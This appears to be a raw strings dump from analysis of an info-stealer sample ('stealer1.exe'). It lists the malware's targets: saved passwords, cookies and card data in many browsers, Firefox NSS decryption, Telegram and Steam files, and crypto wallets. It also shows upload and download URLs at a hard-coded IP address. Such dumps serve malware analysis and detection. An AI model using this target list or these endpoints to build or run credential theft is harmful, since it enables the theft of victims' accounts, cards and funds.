0xa6a7a8 (19): Too many open files
0xa6a7c8 (16): Invalid filename
0xa6a7e8 (14): File not found
0xa6a808 (13): Out of memory
0xa6a828 (14): Service Pack 1
0xa6a848 (19): dddd, MMMM dd, yyyy
0xa6a868 (12): h:mm:ss AMPM
0xa6a888 (15): TInvokableClass
0xa6a8a8 (15): TSoapDataModule
0xa6a8c8 (17): TSOAPDOMProcessor
0xa6a8e8 (12): THTTPReqResp
0xa6a908 (12): TXMLDocument
0xa6a948 (19): C:\Windows\system32
0xa6ab68 (12): EInvalidCast
0xa6aba8 (13): EConvertError
0xa6abe8 (13): EVariantError
0xa6ac28 (13): EPropReadOnly
0xa6ac68 (14): EPropWriteOnly
0xa6aca8 (16): EAssertionFailed
0xa6ace8 (14): EAbstractError
0xa6ad28 (14): EIntfCastError
0xa6ad68 (17): EInvalidContainer
0xa6ada8 (14): EInvalidInsert
0xa6ade8 (13): EPackageError
0xa6ae28 (18): ESafecallException
0xa6ae68 (18): EExternalException
0xa6af08 (12): EIntOverflow
0xa6afe8 (16): EAccessViolation
0xa6b048 (14): EStackOverflow
0xa6b0a8 (12): EStreamError
0xa6b0e8 (13): EFCreateError
0xa6b1a8 (14): EClassNotFound
0xa6b1e8 (15): EMethodNotFound
0xa6b228 (13): EInvalidImage
0xa6b268 (12): EResNotFound
0xa6b2e8 (16): EStringListError
0xa6b328 (15): EComponentError
0xa6b368 (12): EParserError
0xa6b3a8 (15): EOutOfResources
0xa6b3e8 (17): EInvalidOperation
0xa6b448 (13): EqhValidation
0xa6b488 (12): qh.MemStream
0xa6b4a8 (14): qh.IntfHashMap
0xa6b4c8 (13): qh.StringList
0xa6b4e8 (17): qh.VectorIterator
0xa6b508 (19): qh.IntfListIterator
0xa6b528 (14): qh.IntfHashSet
0xa6b568 (18): stealer1.exe[2956]
0xa6b5c8 (18): HttpAnalyzer_StdV7
0xa6b5e8 (19): HttpAnalyzer_StdV71
0xa6b608 (14): DecryptMessage
0xa6b628 (14): EncryptMessage
0xa6b648 (13): gethostbyname
0xa6b668 (16): InternetConnectA
0xa6b6a8 (12): ssleay32.dll
0xa6b6c8 (12): ssleay32.dll
0xa6b6e8 (12): kernel32.dll
0xa6b708 (15): HttpsSendBuffer
0xa6b7a8 (18): HttpAnalyzer_StdV7
0xa6b808 (12): LocalAddress
0xa6b828 (12): qh.MemStream
0xa6b848 (12): SocketHandle
0xa6b868 (14): DLLNotifyEvent
0xa6b888 (12): qh.MemStream
0xa6b8a8 (18): HttpAnalyzer_StdV7
0xa6b8c8 (13): RemoteAddress
0xa6b8e8 (19): \RPC Control\mchIpc
0xa6b908 (16): ReceiveFirstByte
0xa6b928 (15): ReceiveLastByte
0xa6b948 (15): RequestComplete
0xa6b968 (14): DNSLookUpStart
0xa6b988 (13): SendFirstByte
0xa6b9a8 (15): ReceiveLastByte
0xa6b9c8 (15): RequestComplete
0xa719b8 (23): Interface not supported
0xa719e0 (21): External exception %x
0xa71a08 (25): Invalid variant operation
0xa71a30 (22): Privileged instruction
0xa71a58 (22): Invalid class typecast
0xa71a80 (24): Floating point underflow
0xa71aa8 (23): Floating point overflow
0xa71ad0 (21): Invalid numeric input
0xa71af8 (23): Read beyond end of file
0xa71b20 (25): Invalid pointer operation
0xa721b0 (22): qh.StreamableException
0xa721d8 (20): qh.SimplePropertyBag
0xa72200 (24): wINetTypes.TwiNotifyImpl
0xa72340 (20): ws2_32.dll
0xa72390 (22): wsock32.dll
0xa723b8 (24): ssleay32.dll
0xa723e0 (22): wsock32.dll
0xa72408 (24): ssleay32.dll
0xa72430 (20): ws2_32.dll
0xa72458 (20): ws2_32.dll
0xa72480 (20): ws2_32.dll
0xa724a8 (20): ws2_32.dll
0xa724f8 (22): WSAGetOverlappedResult
0xa72520 (20): ws2_32.dll
0xa72548 (20): ws2_32.dll
0xa72570 (20): ws2_32.dll
0xa72598 (22): wininet.dll
0xa725c0 (22): secur32.dll
0xa725e8 (22): secur32.dll
0xa72610 (22): wsock32.dll
0xa72638 (22): wsock32.dll
0xa726b0 (25): GetQueuedCompletionStatus
0xa72700 (24): kernel32.dll
0xa72840 (20): ProcessIdToSessionId
0xa78ce8 (28): Exception in safecall method
0xa78d18 (34): Variant method calls not supported
0xa78d48 (31): Invalid variant type conversion
0xa78d78 (31): Floating point division by zero
0xa78da8 (32): Invalid floating point operation
0xa78f58 (35): wINetIPCMsgs.TwiDLLNotifyParamsImpl
0xa78f88 (35): wINetIPCMsgs.TwiLogNotifyParamsIMPL
0xb00850 (124): Global\BFE_Notify_Event_{97b51811-6670-4505-8b2a-5b63fedd33c9}
0xbc07ea (12): Psched
0xbc08e4 (12): Tcpip6
0xbc0b54 (40): MSAFD Tcpip [TCP/IP]
0xbc0b7e (42): 2\wshtcpip.dll,-60100
0xbc0dc8 (40): MSAFD Tcpip [UDP/IP]
0xbc0df2 (42): 2\wshtcpip.dll,-60101
0xbc103c (40): MSAFD Tcpip [RAW/IP]
0xbc1066 (42): 2\wshtcpip.dll,-60102
0xbc12b0 (44): MSAFD Tcpip [TCP/IPv6]
0xbc12de (34): wship6.dll,-60100
0xbc1524 (44): MSAFD Tcpip [UDP/IPv6]
0xbc1552 (34): wship6.dll,-60101
0xbc1798 (44): MSAFD Tcpip [RAW/IPv6]
0xbc17c6 (34): wship6.dll,-60102
0xbc1a0c (54): RSVP TCPv6 Service Provider
0xbc1a44 (20): s.dll,-100
0xbc1c80 (50): RSVP TCP Service Provider
0xbc1cb4 (24): qos.dll,-101
0xbc1ef4 (54): RSVP UDPv6 Service Provider
0xbc1f2c (20): s.dll,-102
0xbc2168 (50): RSVP UDP Service Provider
0xbc219c (24): qos.dll,-103
0xc64818 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
0xc648ea (14): Q!1AQaq
0xf701d8 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
0xf702aa (14): Q!1AQaq
0x1080864 (26): api.ipify.org
0x1080b78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
0x1080bf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
0x1080c78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
0x1080cf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
0x1080d78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
0x1080df8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
0x1080e78 (44): no-19599.herokussl.com
0x1080ec0 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
0x1080f48 (18): ipify.org
0x1080f80 (52): nagano-19599.herokussl.com
0x2e6f26f (6): ws#
ul
0x71b00025 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
0x71b00345 (6): 8LdrLu
0x7ffe0030 (20): d:\Windows


Login: %s
Password: %s

   templogin   Login Data  %s\%s   templogin   ERROR Don't copy string
    Amigo.txt   %s\Amigo\User Data\Default  a   GOOGLE.txt  %s\Google\Chrome\User Data\Default  a   %s\Vivaldi\User Data\Default    %s\Vivaldi\User Data\Profile 1  %s\Vivaldi\User Data\Profile 2  %s\Vivaldi\User Data\Profile 3  Vivaldi.txt a   %s\Yandex\YandexBrowser\User Data\Default   %s\Yandex\YandexBrowser\User Data\Profile 1     %s\Yandex\YandexBrowser\User Data\Profile 2     %s\Yandex\YandexBrowser\User Data\Profile 3     Yandex.txt  a   %s\Kometa\User Data\Default     %s\Kometa\User Data\Profile 1   %s\Kometa\User Data\Profile 2   %s\Kometa\User Data\Profile 3   Kometa.txt  a   %s\Orbitum\User Data\Default    %s\Orbitum\User Data\Profile 1  %s\Orbitum\User Data\Profile 2  %s\Orbitum\User Data\Profile 3  Orbitum.txt a   %s\Comodo\Dragon\User Data\Default  %s\Comodo\Dragon\User Data\Profile 1    %s\Comodo\Dragon\User Data\Profile 2    %s\Comodo\Dragon\User Data\Profile 3    Comodo.txt  a   %s\Torch\User Data\Default  %s\Torch\User Data\Profile 1    %s\Torch\User Data\Profile 2    %s\Torch\User Data\Profile 3    Torch.txt   a   Opera.txt   %s\Opera Software\Opera Stable  a   %s\Xpom\User Data\Default   %s\Xpom\User Data\Profile 1     %s\Xpom\User Data\Profile 2     %s\Xpom\User Data\Profile 3     MailRu.txt  a   %s\Nichrome\User Data\Default   %s\Nichrome\User Data\Profile 1     %s\Nichrome\User Data\Profile 2     %s\Nichrome\User Data\Profile 3     rambler.txt a   %s\Chromium\User Data\Default   %s\Chromium\User Data\Profile 1     %s\Chromium\User Data\Profile 2     %s\Chromium\User Data\Profile 3     Chromium.txt    a   Maxthon5.txt    %s\Maxthon5\Users\guest     a   Login Data  Web Data    %s\Sputnik\Sputnik\User Data\Default    %s\Sputnik\Sputnik\User Data\Profile 1  %s\Sputnik\Sputnik\User Data\Profile 2  %s\Sputnik\Sputnik\User Data\Profile 3  Sputnik.txt a   %s\Epic Privacy Browser\User Data\Default   %s\Epic Privacy Browser\User Data\Profile 1     %s\Epic Privacy Browser\User Data\Profile 2     %s\Epic Privacy Browser\User Data\Profile 3     Epic.txt    a   %s\CocCocBrowser\User Data\Default  %s\CocCocBrowser\User Data\Profile 1    %s\CocCocBrowser\User Data\Profile 2    %s\CocCocBrowser\User Data\Profile 3    CocCoc.txt  a   GOOGLE.txt  %s\Google\Chrome\User Data\Profile 1    a       GOOGLE.txt  %s\Google\Chrome\User Data\Profile 2    a   GOOGLE.txt  %s\Google\Chrome\User Data\Profile 3    a   GOOGLE.txt  %s\Google\Chrome\User Data\Profile 4    a   Amigo.txt   %s\Amigo\User Data\Profile 4    a   Amigo.txt   %s\Amigo\User Data\Profile 1    a   Amigo.txt   %s\Amigo\User Data\Profile 2    a   Amigo.txt   %s\Amigo\User Data\Profile 3    a   %s  a   %s  %s  %s  %s  %s  %s  %s  %s  %s  %s  %s  %s  %s  %s  %s  %s  Name Card: %s
 Expiration Month: %s
 Expiration Year: %s
Number Card: %s
Billing address id: %s
Email: %s
Number: %s
First name: %s
Middle name: %s
Last name: %s
Full name: %s
Ñompany name: %s
Street address: %s
Dependent locality: %s
City: %s
State: %s
Zipcode: %s


    a   %s  %s  %s  %s  %s	TRUE	%s	FALSE	%s	%s	%s
  templogim   Cookies %s\%s   templogim   templogik   Web Data    %s\%s   templogik   Amigo_Cookies.txt   %s\Amigo\User Data\Default  a   GOOGLE_Cookies.txt  %s\Google\Chrome\User Data\Default  a   %s\Vivaldi\User Data\Default    %s\Vivaldi\User Data\Profile 1  %s\Vivaldi\User Data\Profile 2  %s\Vivaldi\User Data\Profile 3  Vivaldi_Cookies.txt a   %s\Yandex\YandexBrowser\User Data\Default   %s\Yandex\YandexBrowser\User Data\Profile 1     %s\Yandex\YandexBrowser\User Data\Profile 2     %s\Yandex\YandexBrowser\User Data\Profile 3     Yandex_Cookies.txt  a   %s\Kometa\User Data\Default     %s\Kometa\User Data\Profile 1   %s\Kometa\User Data\Profile 2   %s\Kometa\User Data\Profile 3   Kometa_Cookies.txt  a   %s\Orbitum\User Data\Default    %s\Orbitum\User Data\Profile 1  %s\Orbitum\User Data\Profile 2  %s\Orbitum\User Data\Profile 3  Orbitum_Cookies.txt a   %s\Comodo\Dragon\User Data\Default  %s\Comodo\Dragon\User Data\Profile 1    %s\Comodo\Dragon\User Data\Profile 2    %s\Comodo\Dragon\User Data\Profile 3    Comodo_Cookies.txt  a   %s\Torch\User Data\Default  %s\Torch\User Data\Profile 1    %s\Torch\User Data\Profile 2    %s\Torch\User Data\Profile 3    Torch_Cookies.txt   a   Opera_Cookies.txt   %s\Opera Software\Opera Stable  a   %s\Xpom\User Data\Default   %s\Xpom\User Data\Profile 1     %s\Xpom\User Data\Profile 2     %s\Xpom\User Data\Profile 3     MailRu_Cookies.txt  a   %s\Nichrome\User Data\Default   %s\Nichrome\User Data\Profile 1     %s\Nichrome\User Data\Profile 2     %s\Nichrome\User Data\Profile 3     rambler_Cookies.txt a   %s\Chromium\User Data\Default   %s\Chromium\User Data\Profile 1     %s\Chromium\User Data\Profile 2     %s\Chromium\User Data\Profile 3     Chromium_Cookies.txt    a   Maxthon5_Cookies.txt    %s\Maxthon5\Users\guest     a   Login Data  Web Data    %s\Sputnik\Sputnik\User Data\Default    %s\Sputnik\Sputnik\User Data\Profile 1  %s\Sputnik\Sputnik\User Data\Profile 2  %s\Sputnik\Sputnik\User Data\Profile 3  Sputnik_Cookies.txt a   %s\Epic Privacy Browser\User Data\Default   %s\Epic Privacy Browser\User Data\Profile 1     %s\Epic Privacy Browser\User Data\Profile 2     %s\Epic Privacy Browser\User Data\Profile 3     Epic_Cookies.txt    a   %s\CocCocBrowser\User Data\Default  %s\CocCocBrowser\User Data\Profile 1    %s\CocCocBrowser\User Data\Profile 2    %s\CocCocBrowser\User Data\Profile 3    CocCoc_Cookies.txt  a   GOOGLE_Cookies.txt  %s\Google\Chrome\User Data\Profile 1    a       GOOGLE_Cookies.txt  %s\Google\Chrome\User Data\Profile 2    a   GOOGLE_Cookies.txt  %s\Google\Chrome\User Data\Profile 3    a   GOOGLE_Cookies.txt  %s\Google\Chrome\User Data\Profile 4    a   Amigo_Cookies.txt   %s\Amigo\User Data\Profile 4    a   Amigo_Cookies.txt   %s\Amigo\User Data\Profile 1    a   Amigo_Cookies.txt   %s\Amigo\User Data\Profile 2    a   Amigo_Cookies.txt   %s\Amigo\User Data\Profile 3    a   Amigo_CC.txt    %s\Amigo\User Data\Default  a   GOOGLE_CC.txt   %s\Google\Chrome\User Data\Default  a   %s\Vivaldi\User Data\Default    %s\Vivaldi\User Data\Profile 1  %s\Vivaldi\User Data\Profile 2  %s\Vivaldi\User Data\Profile 3  Vivaldi_CC.txt  a   %s\Yandex\YandexBrowser\User Data\Default   %s\Yandex\YandexBrowser\User Data\Profile 1     %s\Yandex\YandexBrowser\User Data\Profile 2     %s\Yandex\YandexBrowser\User Data\Profile 3     Yandex_CC.txt   a   %s\Kometa\User Data\Default     %s\Kometa\User Data\Profile 1   %s\Kometa\User Data\Profile 2   %s\Kometa\User Data\Profile 3   Kometa_CC.txt   a   %s\Orbitum\User Data\Default    %s\Orbitum\User Data\Profile 1  %s\Orbitum\User Data\Profile 2  %s\Orbitum\User Data\Profile 3  Orbitum_CC.txt  a   %s\Comodo\Dragon\User Data\Default  %s\Comodo\Dragon\User Data\Profile 1    %s\Comodo\Dragon\User Data\Profile 2    %s\Comodo\Dragon\User Data\Profile 3    Comodo_CC.txt   a   %s\Torch\User Data\Default  %s\Torch\User Data\Profile 1    %s\Torch\User Data\Profile 2    %s\Torch\User Data\Profile 3    Torch_CC.txt    a   Opera_CC.txt    %s\Opera Software\Opera Stable  a   %s\Xpom\User Data\Default   %s\Xpom\User Data\Profile 1     %s\Xpom\User Data\Profile 2     %s\Xpom\User Data\Profile 3     MailRu_CC.txt   a   %s\Nichrome\User Data\Default   %s\Nichrome\User Data\Profile 1     %s\Nichrome\User Data\Profile 2     %s\Nichrome\User Data\Profile 3     rambler_CC.txt  a   %s\Chromium\User Data\Default   %s\Chromium\User Data\Profile 1     %s\Chromium\User Data\Profile 2     %s\Chromium\User Data\Profile 3     Chromium_CC.txt a   Maxthon5_CC.txt %s\Maxthon5\Users\guest     a   Login Data  Web Data    %s\Sputnik\Sputnik\User Data\Default    %s\Sputnik\Sputnik\User Data\Profile 1  %s\Sputnik\Sputnik\User Data\Profile 2  %s\Sputnik\Sputnik\User Data\Profile 3  Sputnik_CC.txt  a   %s\Epic Privacy Browser\User Data\Default   %s\Epic Privacy Browser\User Data\Profile 1     %s\Epic Privacy Browser\User Data\Profile 2     %s\Epic Privacy Browser\User Data\Profile 3     Epic_CC.txt a   %s\CocCocBrowser\User Data\Default  %s\CocCocBrowser\User Data\Profile 1    %s\CocCocBrowser\User Data\Profile 2    %s\CocCocBrowser\User Data\Profile 3    CocCoc_CC.txt   a   GOOGLE_CC.txt   %s\Google\Chrome\User Data\Profile 1    a       GOOGLE_CC.txt   %s\Google\Chrome\User Data\Profile 2    a   GOOGLE_CC.txt   %s\Google\Chrome\User Data\Profile 3    a   GOOGLE_CC.txt   %s\Google\Chrome\User Data\Profile 4    a   Amigo_CC.txt    %s\Amigo\User Data\Profile 4    a   Amigo_CC.txt    %s\Amigo\User Data\Profile 1    a   Amigo_CC.txt    %s\Amigo\User Data\Profile 2    a   Amigo_CC.txt    %s\Amigo\User Data\Profile 3    a   SOFTWARE\Mozilla\Mozilla Firefox    CurrentVersion  SOFTWARE\Mozilla\Mozilla Firefox    Main    \   Install Directory   Path    Profile0    \   logins  result.txt  %s  %s  a   URL: %s
Login: %s
Password: %s

   hostname    %s  encryptedUsername   encryptedPassword   result.txt  a   URL: %s
Login: %s
Password: %s

   %s\%s   SELECT * FROM moz_logins;   PATH    ;   PATH=   nss3.dll    NSS_Init    NSS_Shutdown    PL_ArenaFinish  PR_Cleanup  PK11_GetInternalKeySlot PK11_FreeSlot   PK11SDR_Decrypt 32.zip  http://141.105.71.82/Libs.zip   wb  result.txt  C:\Program Files\Mozilla Firefox\firefox.exe    a   FireFox
    %s\Mozilla\Firefox\profiles.ini %s\Mozilla\Firefox\%s   C:\Program Files\Waterfox\waterfox.exe  a   Waterfox
   %s\Waterfox\profiles.ini    %s\Waterfox\%s  C:\Program Files\Pale Moon\palemoon.exe a   Pale Moon
  %s\Moonchild Productions\Pale Moon\profiles.ini %s\Moonchild Productions\Pale Moon\%s   C:\Program Files\Cyberfox\Cyberfox.exe  a   Cyberfox
   %s\8pecxstudios\Cyberfox\profiles.ini   %s\8pecxstudios\Cyberfox\%s C:\Program Files\NETGATE\Black Hawk\blackhawk.exe   a   BlackHawk
  %s\NETGATE Technologies\BlackHawk\profiles.ini  %s\NETGATE Technologies\BlackHawk\%s    a   K-Meleon
   %s\K-Meleon\profiles.ini    %s\K-Meleon\%s      ERROR Don't copy string
    C:\ Error   Unable to Allocate Bitmap Memory    wb  Error   Unable to Create Bitmap File    D://prosto.bmp  S o f t w a r e \ C l a s s e s \ t d e s k t o p . t g \ D e f a u l t I c o n     SteamPath   S o f t w a r e \ V a l v e \ S t e a m     Telegram.exe    tdata\D877F783D5D3EF8C1 tdata\D877F783D5D3EF8C0 tdata\D877F783D5D3EF8C\map1 tdata\D877F783D5D3EF8C\map0 Telegram\D877F783D5D3EF8C1  Telegram\D877F783D5D3EF8C0  Telegram\D877F783D5D3EF8C\map1  Telegram\D877F783D5D3EF8C\map0  %Y-%m-%d %H-%M-%S   body.out    https://api.ipify.org   wb  r   .zip    \Steam.exe  \ssfn*  \   \Config\*.* \Config\    browser\GOOGLE.txt  GOOGLE.txt  browser\Amigo.txt   Amigo.txt   browser\Vivaldi.txt Vivaldi.txt browser\YandexBrowser.txt   YandexBrowser.txt   browser\Kometa.txt  Kometa.txt  browser\Orbitum.txt Orbitum.txt browser\Comodo.txt  Comodo.txt  browser\Torch.txt   Torch.txt   browser\MailRu.txt  MailRu.txt  browser\rambler.txt rambler.txt browser\Chromium.txt    Chromium.txt    browser\Sputnik.txt Sputnik.txt browser\Epic.txt    Epic.txt    browser\CocCoc.txt  CocCoc.txt  browser\Opera.txt   Opera.txt   browser\Maxthon5.txt    Maxthon5.txt    browser\firefox.txt result.txt  CC\GOOGLE_CC.txt    GOOGLE_CC.txt   CC\Amigo_CC.txt Amigo_CC.txt    CC\Vivaldi_CC.txt   Vivaldi_CC.txt  CC\YandexBrowser_CC.txt Yandex_CC.txt   CC\Kometa_CC.txt    Kometa_CC.txt   CC\Orbitum_CC.txt   Orbitum_CC.txt  CC\Comodo_CC.txt    Comodo_CC.txt   CC\Torch_CC.txt Torch_CC.txt    CC\MailRu_CC.txt    MailRu_CC.txt   CC\rambler_CC.txt   rambler_CC.txt  CC\Chromium_CC.txt  Chromium_CC.txt CC\Sputnik_CC.txt   Sputnik_CC.txt  CC\Epic_CC.txt  Epic_CC.txt CC\CocCoc_CC.txt    CocCoc_CC.txt   CC\Opera_CC.txt Opera_CC.txt    CC\Maxthon5_CC.txt  Maxthon5_CC.txt Cookies\GOOGLE_Cookies.txt  GOOGLE_Cookies.txt  Cookies\Amigo_Cookies.txt   Amigo_Cookies.txt   Cookies\Vivaldi_Cookies.txt Vivaldi_Cookies.txt Cookies\YandexBrowser_Cookies.txt   Yandex_Cookies.txt  Cookies\Kometa_Cookies.txt  Kometa_Cookies.txt  Cookies\Orbitum_Cookies.txt Orbitum_Cookies.txt Cookies\Comodo_Cookies.txt  Comodo_Cookies.txt  Cookies\Torch_Cookies.txt   Torch_Cookies.txt   Cookies\MailRu_Cookies.txt  MailRu_Cookies.txt  Cookies\rambler_Cookies.txt rambler_Cookies.txt Cookies\Chromium_Cookies.txt    Chromium_Cookies.txt    Cookies\Sputnik_Cookies.txt Sputnik_Cookies.txt Cookies\Epic_Cookies.txt    Epic_Cookies.txt    Cookies\CocCoc_Cookies.txt  CocCoc_Cookies.txt  Cookies\Opera_Cookies.txt   Opera_Cookies.txt   Cookies\Maxthon5_Cookies.txt    Maxthon5_Cookies.txt    \   \*.txt  \*.pfx  No files
   Steam\  No files in current directory!
 Steam\Config\   \Armory\    \Armory\*.* \Dash\  \DashCore\*.dat \Bitcoin\wallets\   \Bitcoin\wallets\*.dat  \Litecoin\wallets\  \Litecoin\wallets\*.dat \Monero\wallets\    \   *.keys  \Doge\  \MultiDoge\*.wallet \Electrum\wallets\  \Electrum\wallets\*.dat \mSIGNA_Bitcoin\wallets\    \mSIGNA_Bitcoin\wallets\*.dat   \Ethereum\keystore\ \Ethereum\keystore\*    \FileZilla\recentservers.xml    FileZilla\recentservers.xml No files in current directory!
 ethereum\   No files in current directory!
 mSIGNA\ No files in current directory!
 Electrum\   No files in current directory!
 Bitcoin\wallets\    No files in current directory!
 Armory\ No files in current directory!
 Dash\   No files in current directory!
 Litecoin\   No files in current directory!
 Doge\   No files in current directory!
 Doge\   No files in current directory!
 txt\    No files in current directory!
 Sertificate\    file    af3c4c9f-8ea3-413f-af4b-5700ee9157bc    id  http://141.105.71.82/Upload/    32.zip  result.txt  mozglue.dll nss3.dll    nssdbm3.dll softokn3.dll    freebl3.dll result_cookies.txt  result_CC.txt   GOOGLE.txt  Amigo.txt   Vivaldi.txt Yandex.txt  Kometa.txt  Orbitum.txt Comodo.txt  Torch.txt   mailru.txt  rambler.txt Chromium.txt    Sputnik.txt Epic.txt    CocCoc.txt  Opera.txt   Maxthon5.txt    result.txt  GOOGLE_CC.txt   Amigo_CC.txt    Vivaldi_CC.txt  Yandex_CC.txt   Kometa_CC.txt   Orbitum_CC.txt  Comodo_CC.txt   Torch_CC.txt    mailru_CC.txt   rambler_CC.txt  Chromium_CC.txt Sputnik_CC.txt  Epic_CC.txt CocCoc_CC.txt   Opera_CC.txt    Maxthon5_CC.txt result_CC.txt   GOOGLE_Cookies.txt  Amigo_Cookies.txt   Vivaldi_Cookies.txt Yandex_Cookies.txt  Kometa_Cookies.txt  Orbitum_Cookies.txt Comodo_Cookies.txt  Torch_Cookies.txt   mailru_Cookies.txt  rambler_Cookies.txt Chromium_Cookies.txt    Sputnik_Cookies.txt Epic_Cookies.txt    CocCoc_Cookies.txt  Opera_Cookies.txt   Maxthon5_Cookies.txt    result_Cookies.txt  body.out    r   c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c   i d x   <   c o u n t   c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c   i d x   = =   c o u n t   -   1      |L €|L -0  xX  r   %4x %4x true    false   null    [
   ,